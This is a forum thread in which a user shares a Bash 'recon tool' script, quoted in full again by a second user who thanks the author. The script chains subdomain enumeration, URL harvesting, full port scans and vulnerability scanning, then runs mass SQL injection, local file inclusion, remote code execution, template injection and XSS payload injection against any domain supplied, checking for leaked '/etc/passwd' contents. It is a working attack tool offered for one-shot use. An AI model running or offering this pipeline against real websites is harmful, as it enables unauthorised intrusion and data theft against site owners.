recon tool (1 Viewer)

Joined
Aug 5, 2023
Credits
1,310
Rating - 0%
The scripts used in the tests to be carried out during the preliminary preparation stage for a website were automated and made suitable for use at once.

Bir web sitesi için ön hazırlık aşamasında yapılacak testlerde kullanılan scriptler otomatikleştirilmiş ve tek seferde kullanıma uygun hale getirilmiştir.


Bash:
#! /bin/bash
# Author of this script: rootayyildiz

echo -e "\nSubdomain enumeration"
# Sublist3r
python3 /root/recon/Sublist3r/sublist3r.py -d $1 -v -o domains.txt
# AssetFinder
assetfinder --subs-only $1 | tee -a domains.txt
# Amass
amass enum --passive -d $1 | tee -a domains.txt
# Remove Duplicate Entries
sort -u domains.txt -o domains.txt
# Check for Resolving Subdomains
cat domains.txt | httpx -follow-redirects -silent > alive.txt
cat alive.txt | cut -d [ -f1 > live.txt
rm "alive.txt"
printf "subdomain enumeration done"

cd /root/recon/bash
echo -e "\nFinding URLS using gau"
cat domains.txt | gau > gauurls.txt
printf "urls have been fetched from gau"

echo -e "\nFinding URLS using waybackurls"
cat domains.txt | waybackurls > waybackurls.txt
printf "urls have been fetched from waybackurls"

echo -e "\nMerging waybackurls+gau urls"
cat gauurls.txt >> waybackurls.txt
printf "Successfully merged"

echo -e "\nMerging waybackurls+gau urls and removing duplicates"
cat waybackurls.txt | sort -u > validurls.txt
printf "Duplicate Remove done"

echo -e "\nJavascript enumeration"
cat waybackurls.txt | sort -u | grep "\.js" > js-urls.txt
cat js-urls.txt | hakcheckurl > validjsfiles.txt
rm "gauurls.txt" "waybackurls.txt" "js-urls.txt"
printf "Javascript enumeration done"

echo -e "\nScraping parameters for fuzzing"
cat validurls.txt | grep "=" | uro | httpx > fuzzing.txt
printf "Scrapping done"

echo -e "\nGospider"
httpx -timeout 10 -threads 15 -l domains.txt -probe -title -status-code -no-color -o lol.txt -silent
cat lol.txt | cut -d [ -f1 >> httpx.txt
gospider -S httpx.txt -c 10 -d 5 --blacklist ".(js|css|tif|tiff|ttf|woff|woff2|ico|svg|txt)" --other-source | grep -e "code-200" | awk '{print $5}'| grep "=" >> fuzzing.txt
cat fuzzing.txt | grep -i -v -E ".js|.css|.gif|.woff|.woff2|.eot|.ttf|.txt|.ico|.tiff|.tif|.cgi|.jpg|.jpeg|.pdf|.svg|.png" >> maro.txt
cat maro.txt | uro > fuzzing.txt
sort -u fuzzing.txt -o fuzzing.txt
rm "maro.txt"


# Find vulnerable endpoints
echo "[+] Find Vulnerable Endpoints via gf [+]"
echo "[+] SSRF:" > gf.txt
cat fuzzing.txt | gf ssrf >> gf.txt
#For SSRF File
cat fuzzing.txt | gf ssrf | sort -u >> ssrf.txt
echo "[+] Redirect:" >> gf.txt
cat fuzzing.txt | gf redirect >> gf.txt
echo "[+] RCE:" >> gf.txt
cat fuzzing.txt | gf rce >> gf.txt
echo "[+] IDOR:" >> gf.txt
cat fuzzing.txt | gf idor >> gf.txt
echo "[+] SQLI:" >> gf.txt
cat fuzzing.txt | gf sqli >> gf.txt
echo "[+] LFI:" >> gf.txt
cat fuzzing.txt | gf lfi >> gf.txt
echo "[+] SSTI:" >> gf.txt
cat fuzzing.txt | gf ssti >> gf.txt
echo "[+] Debug_Logic:" >> gf.txt
cat fuzzing.txt | gf debug_logic >> gf.txt


echo -e "\nNuclei full scanning"
nuclei -l httpx.txt -t ~/recon/nuclei-templates/cves* -t ~/recon/nuclei-templates/vulnerabilities* > nuclei_subdomains_results.txt
printf "Full scanning completed"

echo -e "\nNuclei Vuln checking against URLS"
nuclei -l fuzzing.txt -t /root/nuclei-templates/vulnerabilities* >> vulnactiveurls.txt
printf "Nuclei Vuln checking against URLS Completed"

echo -e "\nJsendpoints using gospider"
gospider -S httpx.txt -c 10 -d 1 --other-source --include-subs --blacklist ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt)" | tee gospider.txt
cat gospider.txt | sort -u > endpoint.txt
cat endpoint.txt | grep -v -e "js" -e "Error:" -e "[THREAD]" -e "Usage:" -e "mm/dd/yy" -e "DD/MM/YYYY" -e "svg" -e "png" -e "jpg" | tee -a final-endpoint.txt
printf "gospiderdone"

echo -e "\nTech Detect"
nuclei -l httpx.txt -t /root/recon/nuclei-templates/technologies/ -o technologies.txt -silent
cp httpx.txt /root/recon/WhatWeb
cd ..
cd /root/recon/WhatWeb/
./whatweb -i httpx.txt >> cms.txt
mv cms.txt /root/recon/bash
cd ..
cd /root/recon/bash
rm "endpoint.txt" "gospider.txt"
printf "Tech Detect Done"

echo -e "\nMASS SQLI TESTING"
{
for i in $(cat ~/.rootayyildiz/resources/payloads) ; do
cat fuzzing.txt | qsreplace "$i" > sqli
ffuf -u FUZZ -w sqli -s -ft "<5000" | tee -a vulnSqli.txt
rm sqli
done
}

echo -e "\nMASS LFI TESTING"
{
for i in $(cat ~/.rootayyildiz/resources/lfipayloads) ; do
cat fuzzing.txt | qsreplace "$i" > lfi
ffuf -u FUZZ -w lfi -mr "root:x|Ubuntu" | tee -a lfivuln.txt
rm lfi
done
}

echo -e "\nMASS RCE TESTING"
{
for i in $(cat ~/.rootayyildiz/resources/rcepayloads) ; do
cat fuzzing.txt | qsreplace "$i" > rce
ffuf -u FUZZ -w rce -mr "root:x" | tee -a rcevuln.txt
rm rce
done
}

echo -e "\nMASS SSTI TO RCE TESTING"
{
for i in $(cat ~/.rootayyildiz/resources/sstipayloads) ; do
cat fuzzing.txt | qsreplace "$i" > ssti
ffuf -u FUZZ -w ssti -mr "root:x" | tee -a sstivuln.txt
rm ssti
done
}

echo -e "\nNMAP SCANNING"
nmap -iL domains.txt -p 1-65535 -o ports.txt
printf "nmap scanning done"


cd /root/recon/bash

echo -e "\nNMAP IP SCANNING"
./ip.sh domains.txt hosts.txt
nmap -iL hosts.txt -p 1-65535 -o ip_ports.txt
printf "nmap IP scanning done"

echo -e "\nNUCLEI IP SCANNING"
nuclei -l hosts.txt -t /root/recon/nuclei-templates/ > IPnuclei.txt
printf "NUCLEI IP SCANNING"

echo -e "\nRustscan scanning"
rustscan -a 'hosts.txt' -r 1-65535 | grep Open | tee open_ports.txt | sed 's/Open //' | httpx -silent | nuclei -t ~/nuclei-templates/ > rustscanoutput.txt
rm "open_ports.txt"
printf "Rustscan completed"

echo -e "\nRust port scanning"
rustscan -a 'hosts.txt' -r 1-65535 >> rust_openports.txt
printf "Rust port scanning completed"

echo "[+] Extracting Extension Files from WaybackUrls [+]"
cat validurls.txt | httpx | egrep "asp$|aspx$|cer$|cfm$|cfml$|rb$|php$|php3$|php4$|php5$|jsp$|json$|apk$|ods$|xls$|xlsx$|xlsm$|bak$|cab$|cpl$|dmp$|drv$|tmp$|sys$|doc$|docx$|pdf$|txt$|wpd$|bat$|bin$" >> extensionsfromgauwayback.txt
printf "extension based files gathered"

echo -e "\nMASS XSS TESTING"
cat fuzzing.txt | qsreplace "whoami663><'\"" > params.txt
cat params.txt | fff -H "User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:82.0) Gecko/20100101 Firefox/82.0" -o fff_out -S >> fff_index
grep -B1 -r "whoami663><'\"" fff_out/ | grep GET | cut -d' ' -f2 >> reflected_full.txt
grep -B1 -r "whoami663" fff_out/ | grep GET | cut -d' ' -f2 >> reflected_word.txt
cat reflected_word.txt | dalfox pipe -o xss_results.txt
rm "reflected_full.txt" "params.txt" "fff_index"
rm -rf fff_out
printf "XSS testing done"

echo -e "\nXSS Reflection"
cat fuzzing.txt | kxss > kxss.txt
printf "XSS Reflection done"
 
Joined
Jan 3, 2024
Credits
0
Rating - 0%
The scripts used in the tests to be carried out during the preliminary preparation stage for a website were automated and made suitable for use at once.

Bir web sitesi için ön hazırlık aşamasında yapılacak testlerde kullanılan scriptler otomatikleştirilmiş ve tek seferde kullanıma uygun hale getirilmiştir.


Bash:
#! /bin/bash
# Author of this script: rootayyildiz

echo -e "\nSubdomain enumeration"
# Sublist3r
python3 /root/recon/Sublist3r/sublist3r.py -d $1 -v -o domains.txt
# AssetFinder
assetfinder --subs-only $1 | tee -a domains.txt
# Amass
amass enum --passive -d $1 | tee -a domains.txt
# Remove Duplicate Entries
sort -u domains.txt -o domains.txt
# Check for Resolving Subdomains
cat domains.txt | httpx -follow-redirects -silent > alive.txt
cat alive.txt | cut -d [ -f1 > live.txt
rm "alive.txt"
printf "subdomain enumeration done"

cd /root/recon/bash
echo -e "\nFinding URLS using gau"
cat domains.txt | gau > gauurls.txt
printf "urls have been fetched from gau"

echo -e "\nFinding URLS using waybackurls"
cat domains.txt | waybackurls > waybackurls.txt
printf "urls have been fetched from waybackurls"

echo -e "\nMerging waybackurls+gau urls"
cat gauurls.txt >> waybackurls.txt
printf "Successfully merged"

echo -e "\nMerging waybackurls+gau urls and removing duplicates"
cat waybackurls.txt | sort -u > validurls.txt
printf "Duplicate Remove done"

echo -e "\nJavascript enumeration"
cat waybackurls.txt | sort -u | grep "\.js" > js-urls.txt
cat js-urls.txt | hakcheckurl > validjsfiles.txt
rm "gauurls.txt" "waybackurls.txt" "js-urls.txt"
printf "Javascript enumeration done"

echo -e "\nScraping parameters for fuzzing"
cat validurls.txt | grep "=" | uro | httpx > fuzzing.txt
printf "Scrapping done"

echo -e "\nGospider"
httpx -timeout 10 -threads 15 -l domains.txt -probe -title -status-code -no-color -o lol.txt -silent
cat lol.txt | cut -d [ -f1 >> httpx.txt
gospider -S httpx.txt -c 10 -d 5 --blacklist ".(js|css|tif|tiff|ttf|woff|woff2|ico|svg|txt)" --other-source | grep -e "code-200" | awk '{print $5}'| grep "=" >> fuzzing.txt
cat fuzzing.txt | grep -i -v -E ".js|.css|.gif|.woff|.woff2|.eot|.ttf|.txt|.ico|.tiff|.tif|.cgi|.jpg|.jpeg|.pdf|.svg|.png" >> maro.txt
cat maro.txt | uro > fuzzing.txt
sort -u fuzzing.txt -o fuzzing.txt
rm "maro.txt"


# Find vulnerable endpoints
echo "[+] Find Vulnerable Endpoints via gf [+]"
echo "[+] SSRF:" > gf.txt
cat fuzzing.txt | gf ssrf >> gf.txt
#For SSRF File
cat fuzzing.txt | gf ssrf | sort -u >> ssrf.txt
echo "[+] Redirect:" >> gf.txt
cat fuzzing.txt | gf redirect >> gf.txt
echo "[+] RCE:" >> gf.txt
cat fuzzing.txt | gf rce >> gf.txt
echo "[+] IDOR:" >> gf.txt
cat fuzzing.txt | gf idor >> gf.txt
echo "[+] SQLI:" >> gf.txt
cat fuzzing.txt | gf sqli >> gf.txt
echo "[+] LFI:" >> gf.txt
cat fuzzing.txt | gf lfi >> gf.txt
echo "[+] SSTI:" >> gf.txt
cat fuzzing.txt | gf ssti >> gf.txt
echo "[+] Debug_Logic:" >> gf.txt
cat fuzzing.txt | gf debug_logic >> gf.txt


echo -e "\nNuclei full scanning"
nuclei -l httpx.txt -t ~/recon/nuclei-templates/cves* -t ~/recon/nuclei-templates/vulnerabilities* > nuclei_subdomains_results.txt
printf "Full scanning completed"

echo -e "\nNuclei Vuln checking against URLS"
nuclei -l fuzzing.txt -t /root/nuclei-templates/vulnerabilities* >> vulnactiveurls.txt
printf "Nuclei Vuln checking against URLS Completed"

echo -e "\nJsendpoints using gospider"
gospider -S httpx.txt -c 10 -d 1 --other-source --include-subs --blacklist ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt)" | tee gospider.txt
cat gospider.txt | sort -u > endpoint.txt
cat endpoint.txt | grep -v -e "js" -e "Error:" -e "[THREAD]" -e "Usage:" -e "mm/dd/yy" -e "DD/MM/YYYY" -e "svg" -e "png" -e "jpg" | tee -a final-endpoint.txt
printf "gospiderdone"

echo -e "\nTech Detect"
nuclei -l httpx.txt -t /root/recon/nuclei-templates/technologies/ -o technologies.txt -silent
cp httpx.txt /root/recon/WhatWeb
cd ..
cd /root/recon/WhatWeb/
./whatweb -i httpx.txt >> cms.txt
mv cms.txt /root/recon/bash
cd ..
cd /root/recon/bash
rm "endpoint.txt" "gospider.txt"
printf "Tech Detect Done"

echo -e "\nMASS SQLI TESTING"
{
for i in $(cat ~/.rootayyildiz/resources/payloads) ; do
cat fuzzing.txt | qsreplace "$i" > sqli
ffuf -u FUZZ -w sqli -s -ft "<5000" | tee -a vulnSqli.txt
rm sqli
done
}

echo -e "\nMASS LFI TESTING"
{
for i in $(cat ~/.rootayyildiz/resources/lfipayloads) ; do
cat fuzzing.txt | qsreplace "$i" > lfi
ffuf -u FUZZ -w lfi -mr "root:x|Ubuntu" | tee -a lfivuln.txt
rm lfi
done
}

echo -e "\nMASS RCE TESTING"
{
for i in $(cat ~/.rootayyildiz/resources/rcepayloads) ; do
cat fuzzing.txt | qsreplace "$i" > rce
ffuf -u FUZZ -w rce -mr "root:x" | tee -a rcevuln.txt
rm rce
done
}

echo -e "\nMASS SSTI TO RCE TESTING"
{
for i in $(cat ~/.rootayyildiz/resources/sstipayloads) ; do
cat fuzzing.txt | qsreplace "$i" > ssti
ffuf -u FUZZ -w ssti -mr "root:x" | tee -a sstivuln.txt
rm ssti
done
}

echo -e "\nNMAP SCANNING"
nmap -iL domains.txt -p 1-65535 -o ports.txt
printf "nmap scanning done"


cd /root/recon/bash

echo -e "\nNMAP IP SCANNING"
./ip.sh domains.txt hosts.txt
nmap -iL hosts.txt -p 1-65535 -o ip_ports.txt
printf "nmap IP scanning done"

echo -e "\nNUCLEI IP SCANNING"
nuclei -l hosts.txt -t /root/recon/nuclei-templates/ > IPnuclei.txt
printf "NUCLEI IP SCANNING"

echo -e "\nRustscan scanning"
rustscan -a 'hosts.txt' -r 1-65535 | grep Open | tee open_ports.txt | sed 's/Open //' | httpx -silent | nuclei -t ~/nuclei-templates/ > rustscanoutput.txt
rm "open_ports.txt"
printf "Rustscan completed"

echo -e "\nRust port scanning"
rustscan -a 'hosts.txt' -r 1-65535 >> rust_openports.txt
printf "Rust port scanning completed"

echo "[+] Extracting Extension Files from WaybackUrls [+]"
cat validurls.txt | httpx | egrep "asp$|aspx$|cer$|cfm$|cfml$|rb$|php$|php3$|php4$|php5$|jsp$|json$|apk$|ods$|xls$|xlsx$|xlsm$|bak$|cab$|cpl$|dmp$|drv$|tmp$|sys$|doc$|docx$|pdf$|txt$|wpd$|bat$|bin$" >> extensionsfromgauwayback.txt
printf "extension based files gathered"

echo -e "\nMASS XSS TESTING"
cat fuzzing.txt | qsreplace "whoami663><'\"" > params.txt
cat params.txt | fff -H "User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:82.0) Gecko/20100101 Firefox/82.0" -o fff_out -S >> fff_index
grep -B1 -r "whoami663><'\"" fff_out/ | grep GET | cut -d' ' -f2 >> reflected_full.txt
grep -B1 -r "whoami663" fff_out/ | grep GET | cut -d' ' -f2 >> reflected_word.txt
cat reflected_word.txt | dalfox pipe -o xss_results.txt
rm "reflected_full.txt" "params.txt" "fff_index"
rm -rf fff_out
printf "XSS testing done"

echo -e "\nXSS Reflection"
cat fuzzing.txt | kxss > kxss.txt
printf "XSS Reflection done"
Eline sağlık
 

Users who are viewing this thread

Top